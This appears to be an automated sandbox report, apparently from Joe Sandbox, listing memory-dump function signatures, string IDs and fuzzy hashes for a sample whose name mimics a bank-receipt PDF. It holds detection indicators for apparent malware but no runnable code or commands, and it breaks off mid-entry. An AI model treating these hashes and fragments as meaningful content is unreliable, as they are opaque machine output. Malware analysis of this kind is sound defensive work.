                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %O@8$%O@8$tQ=)$tQ=)
                                                                                                                                                          • API String ID: 0-749352435
                                                                                                                                                          • Opcode ID: a2139aef36ceaac84203986f96d4ea898f80e249ab612e44e9fb96d6d65c7a16
                                                                                                                                                          • Instruction ID: 43b4654b809403e7b18be3a0bcf6b4d3a59e2aed4196d0831137fee617a87fb0
                                                                                                                                                          • Opcode Fuzzy Hash: a2139aef36ceaac84203986f96d4ea898f80e249ab612e44e9fb96d6d65c7a16
                                                                                                                                                          • Instruction Fuzzy Hash: 6271DE74E0520A9FCB48CFA9D58499EFBF1FF89210F14856AE429AB324D730AA41CF54
                                                                                                                                                          Function 0B844518 Relevance: 5.2, Strings: 4, Instructions: 162COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 18'$18'$aY$aY
                                                                                                                                                          • API String ID: 0-3687307736
                                                                                                                                                          • Opcode ID: 28202e242a753aad6e5feb629d970ac9b29fdec6e5189e00d92d4a848157cdcf
                                                                                                                                                          • Instruction ID: 1502924b4cecf90762e78033f9da1e3527e0a92eb4b6c9f7d1ad1782fca862bb
                                                                                                                                                          • Opcode Fuzzy Hash: 28202e242a753aad6e5feb629d970ac9b29fdec6e5189e00d92d4a848157cdcf
                                                                                                                                                          • Instruction Fuzzy Hash: 9471E2B4D0120ECFCB04CF99D581AAEFBB1BF89314F198519D429AB314DB34A982CF95
                                                                                                                                                          Function 0B843959 Relevance: 3.9, Strings: 3, Instructions: 176COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %O@8$tQ=)$tQ=)
                                                                                                                                                          • API String ID: 0-2920369752
                                                                                                                                                          • Opcode ID: 4956ce83578e0709fba7ca2f266a601614b4de9fb9d1ad05a667e52167ef8760
                                                                                                                                                          • Instruction ID: 167a687c27a09f129cb09c3d14e39ecbeafee24047c8ddceba93c402e864c367
                                                                                                                                                          • Opcode Fuzzy Hash: 4956ce83578e0709fba7ca2f266a601614b4de9fb9d1ad05a667e52167ef8760
                                                                                                                                                          • Instruction Fuzzy Hash: 8171DE74E0520A9FCB48CFA9D58499EFBF1FF89310B14856AE429EB324D734AA41CF54
                                                                                                                                                          Function 0B845030 Relevance: 3.9, Strings: 3, Instructions: 115COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,uRR$6yu[$6yu[
                                                                                                                                                          • API String ID: 0-86511755
                                                                                                                                                          • Opcode ID: d1b0005014d657e6d4793dc080ce4aa2d9d46de25c632f14ba8c1b6b5db46c8e
                                                                                                                                                          • Instruction ID: c7ef4a96f683562bebf51a0c0628e451ecd37de907a43f4bf00381f42700f3b0
                                                                                                                                                          • Opcode Fuzzy Hash: d1b0005014d657e6d4793dc080ce4aa2d9d46de25c632f14ba8c1b6b5db46c8e
                                                                                                                                                          • Instruction Fuzzy Hash: 974105B4E0560EDFCB04CFAAC5815EEFBF2AB89300F24D06AC415E7265E7349A418B95
                                                                                                                                                          Function 0B845040 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,uRR$6yu[$6yu[
                                                                                                                                                          • API String ID: 0-86511755
                                                                                                                                                          • Opcode ID: afd2cf34853df748a40ddff42b4b7bf316d93725e020a30a64c27d7ac36e06dc
                                                                                                                                                          • Instruction ID: 243fea43af1d40dfe48de326a104cfb0e66ba2675d8b63cd178256d065dc451f
                                                                                                                                                          • Opcode Fuzzy Hash: afd2cf34853df748a40ddff42b4b7bf316d93725e020a30a64c27d7ac36e06dc
                                                                                                                                                          • Instruction Fuzzy Hash: E141E5B4E0520EDFCB04CFAAC5815EEFBF2AB99300F24D46AC415F7265E7349A418B95
                                                                                                                                                          Function 0B847F60 Relevance: 2.8, Strings: 2, Instructions: 297COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 9u"K$Zjsq
                                                                                                                                                          • API String ID: 0-1261923490
                                                                                                                                                          • Opcode ID: 2a0000e4a56a3b2f5c44f9ed5d7501de217f3b5070389e04f292dadc9a963b63
                                                                                                                                                          • Instruction ID: d86fd6123e775b5aa22c32bb8e833983ca25c60d595bbdf0d4a0e15b8c92a28a
                                                                                                                                                          • Opcode Fuzzy Hash: 2a0000e4a56a3b2f5c44f9ed5d7501de217f3b5070389e04f292dadc9a963b63
                                                                                                                                                          • Instruction Fuzzy Hash: F6C1CF74E1561DDBCB18CFAAD58089EFBF2BB89310F18D52AD419EB228D7349942CF10
                                                                                                                                                          Function 0B847F70 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 9u"K$Zjsq
                                                                                                                                                          • API String ID: 0-1261923490
                                                                                                                                                          • Opcode ID: b73abce73ac86a4a67a9f553fac9537b1df0f735dc682e9b11479bd0bbdc4431
                                                                                                                                                          • Instruction ID: 15df7cb2b3d1c54b8c28b4f815e2ce18a344b17b63dd8e41aa6fa7bffb469182
                                                                                                                                                          • Opcode Fuzzy Hash: b73abce73ac86a4a67a9f553fac9537b1df0f735dc682e9b11479bd0bbdc4431
                                                                                                                                                          • Instruction Fuzzy Hash: 3DC1CFB0E1561DDBCB18CFAAD58049EFBF2BB89310F18D52AD419EB228D7349942CF14
                                                                                                                                                          Function 056F5A88 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: V$V
                                                                                                                                                          • API String ID: 0-2921366535
                                                                                                                                                          • Opcode ID: 2570541656d727239c0984d42d260d6902ac5bf8aee0a02725573b11b78cbbfd
                                                                                                                                                          • Instruction ID: 139fe40d9dbcdbcfb68980a9807e4ace4a6ac0482bbba4765cdeb43b3c505ca6
                                                                                                                                                          • Opcode Fuzzy Hash: 2570541656d727239c0984d42d260d6902ac5bf8aee0a02725573b11b78cbbfd
                                                                                                                                                          • Instruction Fuzzy Hash: 15613670E05208DFCB05CFA9D5548DEBBB2FF8A311F14946AD516BB254DB349906CF24
                                                                                                                                                          Function 0B844508 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 18'$aY
                                                                                                                                                          • API String ID: 0-535677718
                                                                                                                                                          • Opcode ID: af76a8345623e69086df7d1f065e64bd13b84d643e9e1db5206960204b9f6cdc
                                                                                                                                                          • Instruction ID: 779bb17f6ba8b1db9c6a9b266a25cdf97f8ed048291263c60f32eb3655b79f0f
                                                                                                                                                          • Opcode Fuzzy Hash: af76a8345623e69086df7d1f065e64bd13b84d643e9e1db5206960204b9f6cdc
                                                                                                                                                          • Instruction Fuzzy Hash: 1961A1B4E0120ECFCB04CF99D581AAEBBB1BF89310F19855AD415EB325D734A9828F95
                                                                                                                                                          Function 01655451 Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 9Vkg$S->6
                                                                                                                                                          • API String ID: 0-948030788
                                                                                                                                                          • Opcode ID: bd0f4370e05dd7374438b35fda24fb40bd5a9ceb7cddd39e40f848697ce9a33b
                                                                                                                                                          • Instruction ID: fed59784c71c0d25bbb266dc4a6db4c8ecb68e55d55b82450aec055354221bcf
                                                                                                                                                          • Opcode Fuzzy Hash: bd0f4370e05dd7374438b35fda24fb40bd5a9ceb7cddd39e40f848697ce9a33b
                                                                                                                                                          • Instruction Fuzzy Hash: 2D411870E0620ADFCB88CFA9C9855EEFBF2EF88310F14D46AC915A7255E7349A418F54
                                                                                                                                                          Function 01655460 Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 9Vkg$S->6
                                                                                                                                                          • API String ID: 0-948030788
                                                                                                                                                          • Opcode ID: 890f516d3dda2fdc0b5a7627ef2f3f7dc3213e61a62f0deb611c94d51b8fedf6
                                                                                                                                                          • Instruction ID: 795db960c06d51582c31d83fd5d4e9406523ddbbc99efab955266950aa41e313
                                                                                                                                                          • Opcode Fuzzy Hash: 890f516d3dda2fdc0b5a7627ef2f3f7dc3213e61a62f0deb611c94d51b8fedf6
                                                                                                                                                          • Instruction Fuzzy Hash: 9941F9B0E0620ADBCB44CFA9D9845EEFBF2BF88310F14D569C519B7214E7349A418F54
                                                                                                                                                          Function 056F6F98 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: d59$d59
                                                                                                                                                          • API String ID: 0-974283460
                                                                                                                                                          • Opcode ID: 6d2be1bdc59754d01bda5a3cb44a4de73e9a77346815af0b15991f2ad2490275
                                                                                                                                                          • Instruction ID: e23a6ff95c98c7a995a2b00cccef1918e940e0255de8b794b8d73a1442de142d
                                                                                                                                                          • Opcode Fuzzy Hash: 6d2be1bdc59754d01bda5a3cb44a4de73e9a77346815af0b15991f2ad2490275
                                                                                                                                                          • Instruction Fuzzy Hash: 7E211EB0E11619DBDB18CFAAD8416AEF7B7FFC8210F14C06AD609A7254DB305A418F51
                                                                                                                                                          Function 056F6F8B Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: d59$d59
                                                                                                                                                          • API String ID: 0-974283460
                                                                                                                                                          • Opcode ID: e72bc8b2dd3a205458473674335c8dce3cd8d5008e3d46c118186d2a83ea2a66
                                                                                                                                                          • Instruction ID: 028d3b69cc3afeb7d92841e3797a9762dce9f1909f808228cc7511f058e9eff4
                                                                                                                                                          • Opcode Fuzzy Hash: e72bc8b2dd3a205458473674335c8dce3cd8d5008e3d46c118186d2a83ea2a66
                                                                                                                                                          • Instruction Fuzzy Hash: 79215EB0E11219CBDB19CFAAD9406AEFBB3BF89200F14C06AD508F7355DA304A45CF51
                                                                                                                                                          Function 0B841711 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ]]o
                                                                                                                                                          • API String ID: 0-2636374853
                                                                                                                                                          • Opcode ID: 9210aaf26442e48b085b4a8090c7c719e21b4c7101eecd0b5f30d9692056cd0f
                                                                                                                                                          • Instruction ID: 4b05b0345aeda770579fec66b963cf3cab9f683226478febd0ddc7be80186f05
                                                                                                                                                          • Opcode Fuzzy Hash: 9210aaf26442e48b085b4a8090c7c719e21b4c7101eecd0b5f30d9692056cd0f
                                                                                                                                                          • Instruction Fuzzy Hash: 2581E574E0120ADFCB04DFA9D5859AEFBB2FB88310F10856AE515E7324D7349A81CF94
                                                                                                                                                          Function 0B841720 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ]]o
                                                                                                                                                          • API String ID: 0-2636374853
                                                                                                                                                          • Opcode ID: f817b91fca4763f744f0d258be44a673b665d32a0ca352fa6940ea14bc0ced58
                                                                                                                                                          • Instruction ID: 5224b14e466a20d80414392fbc6987cce65726776416861517241858e9a9412f
                                                                                                                                                          • Opcode Fuzzy Hash: f817b91fca4763f744f0d258be44a673b665d32a0ca352fa6940ea14bc0ced58
                                                                                                                                                          • Instruction Fuzzy Hash: F671F374E0120EDFCB04DF99D5849AEFBB2FB88310F14856AE515B7328D734AA818F94
                                                                                                                                                          Function 0B845CB1 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: i#)6
                                                                                                                                                          • API String ID: 0-3600651614
                                                                                                                                                          • Opcode ID: 230484c8d59b35586c10f264b949e0ab621df9c686bfdfea64a961dd0f35d59d
                                                                                                                                                          • Instruction ID: 1242e2390b0ff9d605180b190c2ffcb98ce7e4dbf5a308bd15a23e266c8c0cb2
                                                                                                                                                          • Opcode Fuzzy Hash: 230484c8d59b35586c10f264b949e0ab621df9c686bfdfea64a961dd0f35d59d
                                                                                                                                                          • Instruction Fuzzy Hash: C24139B0E0620EDFCB08CFA6C5456AEFBF1AF99704F20946AC015E7264E3349B458B95
                                                                                                                                                          Function 0B845CC0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: i#)6
                                                                                                                                                          • API String ID: 0-3600651614
                                                                                                                                                          • Opcode ID: dc4a0d76b74dc34347a809d9b819ac09819c7681eb6b550134fcceb92a0dc4f3
                                                                                                                                                          • Instruction ID: 1ca58380d222ee85a4257a9378e3a08f37fc31f986b22d35590316bf49e128ef
                                                                                                                                                          • Opcode Fuzzy Hash: dc4a0d76b74dc34347a809d9b819ac09819c7681eb6b550134fcceb92a0dc4f3
                                                                                                                                                          • Instruction Fuzzy Hash: 6D41F9B0E0620EDBCB48CFA6C5456EEFBF1AF95704F20D42AC115E7264E33497458B95
                                                                                                                                                          Function 0A0F7968 Relevance: .4, Instructions: 424COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cf5fe6ba6c2c2d4c274ff8ff12537817816a743703f2513203262b6eb68f13ac
                                                                                                                                                          • Instruction ID: faa731ddecef52b5ee0ec4b88e3b966ddf5303a805deba1986c15e232d34acf9
                                                                                                                                                          • Opcode Fuzzy Hash: cf5fe6ba6c2c2d4c274ff8ff12537817816a743703f2513203262b6eb68f13ac
                                                                                                                                                          • Instruction Fuzzy Hash: C3F1DD70B016099FDB65DF75C814BAEBBF6AF89200F14886EC205AB691DB34E941CB52
                                                                                                                                                          Function 0B84ECC8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1e383889cd3fbbb7ac50521d02477ef8913a3946ee383e6859f1d7ffee76fa90
                                                                                                                                                          • Instruction ID: 2d7bade80e22d4f766c1dfcdb6c7c3d0fff0921cafe6c2a018285a5ad4a40c4c
                                                                                                                                                          • Opcode Fuzzy Hash: 1e383889cd3fbbb7ac50521d02477ef8913a3946ee383e6859f1d7ffee76fa90
                                                                                                                                                          • Instruction Fuzzy Hash: 70E1C574E042598FCB14CFA9C5809AEFBB2FF89305F248169E418AB356D735AD81CF61
                                                                                                                                                          Function 0B84F100 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 582f9ed1613971c8bc282bd3ebc9fb8e5e925404e34a0ea332a94039ba99be4d
                                                                                                                                                          • Instruction ID: e25743be37df3f8f4ae5778013d71f426c74c740b1d550e1a4f6f3e68a8aa832
                                                                                                                                                          • Opcode Fuzzy Hash: 582f9ed1613971c8bc282bd3ebc9fb8e5e925404e34a0ea332a94039ba99be4d
                                                                                                                                                          • Instruction Fuzzy Hash: 06E1C774E041198FCB14CFA9D5809AEBBF2FF89305F248169E518AB356D734AD81CF61
                                                                                                                                                          Function 0B84F538 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0f0b83d7a1ad1eecbc4e182e428f6a491c692ca8ae23426f2c2ead34dc7e6831
                                                                                                                                                          • Instruction ID: 65b32831e6e77fc58e329899961e5d77567987c60f292fcfc0a5df31e58d674b
                                                                                                                                                          • Opcode Fuzzy Hash: 0f0b83d7a1ad1eecbc4e182e428f6a491c692ca8ae23426f2c2ead34dc7e6831
                                                                                                                                                          • Instruction Fuzzy Hash: 5CE1D674E041598FDB14CFA9C5809AEFBB2FF89304F248169E518AB366D734AD81CF60
                                                                                                                                                          Function 0A0F02A0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bfc4ffe67f0343ef453cce1bf0a707fb094e8639a8b50e0ca7b221f54db3fc04
                                                                                                                                                          • Instruction ID: 2e22afa0b63c57092717f99e28f854a0b99e62bf5be3b479fd20f0bf1ffddd2f
                                                                                                                                                          • Opcode Fuzzy Hash: bfc4ffe67f0343ef453cce1bf0a707fb094e8639a8b50e0ca7b221f54db3fc04
                                                                                                                                                          • Instruction Fuzzy Hash: F0E1D7B4E042198FCB14DFA9C5809AEBBF2FF89304F248569E514AB756D734AD81CF60
                                                                                                                                                          Function 0A0F1058 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 25c4ce5f06e4f0ce6670ad5ecc201258537578dce84aaaede9a21fa4ff02c98d
                                                                                                                                                          • Instruction ID: 9ebf22485ad9369c7870217fdf50f3156116c05c793da2c3ecdac792c0a23f5f
                                                                                                                                                          • Opcode Fuzzy Hash: 25c4ce5f06e4f0ce6670ad5ecc201258537578dce84aaaede9a21fa4ff02c98d
                                                                                                                                                          • Instruction Fuzzy Hash: FFE1D674E04119CBCB14CFA9C5809AEBBF2FF89304F248669E914AB756D735AD81CF60
                                                                                                                                                          Function 056F54C9 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bd020824207be1a5afe2642fed017522017ca5db29c9566aa7057851e518e2d2
                                                                                                                                                          • Instruction ID: 7426bd3aa5c7773373458d35e4898701b0f34f2f0abeb15138b6d56eb76408d2
                                                                                                                                                          • Opcode Fuzzy Hash: bd020824207be1a5afe2642fed017522017ca5db29c9566aa7057851e518e2d2
                                                                                                                                                          • Instruction Fuzzy Hash: A6D1D43181465A8ACB11EF64D950A99F7B1FF95300F10C7AAD5097B624EB70AEC8CB91
                                                                                                                                                          Function 056F54D8 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7d9c8d2fa90c6e676c4d9f4562faff0251f575064d55ff25a933c2ac7d0087b4
                                                                                                                                                          • Instruction ID: 58230aee6f498844f93fba9db023ef426fbea1e51fb8823eca91c0136def5226
                                                                                                                                                          • Opcode Fuzzy Hash: 7d9c8d2fa90c6e676c4d9f4562faff0251f575064d55ff25a933c2ac7d0087b4
                                                                                                                                                          • Instruction Fuzzy Hash: 01D1B33181465A9ACB10EFA4D950A99F7B1FF95300F10C7AAD5097B624EF70AEC8CB91
                                                                                                                                                          Function 056F66B8 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
